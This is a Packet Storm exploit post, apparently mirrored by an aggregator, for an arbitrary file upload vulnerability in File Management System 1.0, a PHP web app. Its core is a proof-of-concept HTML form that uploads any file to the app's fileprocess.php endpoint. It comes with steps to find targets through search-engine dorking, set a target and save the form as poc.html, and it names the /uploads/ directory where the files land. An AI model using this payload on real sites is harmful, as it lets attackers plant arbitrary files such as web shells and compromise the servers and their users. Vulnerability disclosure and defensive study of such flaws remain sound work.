File Management System 1.0 Arbitrary File Upload
2024-8-28 23:18:2 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

File Management System 1.0 Arbitrary File Upload
Posted Aug 28, 2024
Authored by indoushka

File Management System version 1.0 suffers from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
SHA-256 | d7190aeb73675b4c80d6ccca7878d2547c38a9ee67ce2c6eb9c502dbff60d004
Download | Favorite | View
=============================================================================================================================================
| # Title : File Management System 1.0 Arbitrary File upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 1 : Set your target.

[+] Save As poc.html

[+] Payload :

<form name="" action="http://127.0.0.1/filemanagement/Private_Dashboard/fileprocess.php" method="POST" enctype="multipart/form-data">
<!-- Hidden Email Input -->
<input type="hidden" name="email" value="">

<!-- File Input -->
<label for="myfile">Upload File:</label>
<input type="file" id="myfile" name="myfile" required>

<!-- Submit Button -->
<input type="submit" name="save" value="Save">
</form>

[+] /uploads/

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

File Tags

Systems


文章来源: https://packetstormsecurity.com/files/180410/fms10-upload.txt
如有侵权请联系:admin#unsafe.sh